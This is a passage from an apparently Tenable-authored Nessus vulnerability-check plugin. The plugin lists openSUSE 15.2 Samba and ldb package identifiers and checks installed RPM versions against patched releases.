value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-ldb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-ldb-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-ldb-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-ldb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-ldb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-pcp-pmda-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-pcp-pmda-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-tests-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-tests-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ldb-debugsource-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ldb-tools-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ldb-tools-debuginfo-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-binding0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-binding0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libldb-devel-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libldb2-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libldb2-debuginfo-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy-python3-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy0-python3-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy0-python3-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap2-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap2-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient0-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient0-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"python3-ldb-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"python3-ldb-debuginfo-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"python3-ldb-devel-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-ad-dc-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-ad-dc-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-client-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-client-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-core-devel-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-debugsource-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-dsdb-modules-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-dsdb-modules-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-python3-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-python3-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-python3-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-python3-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-test-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", 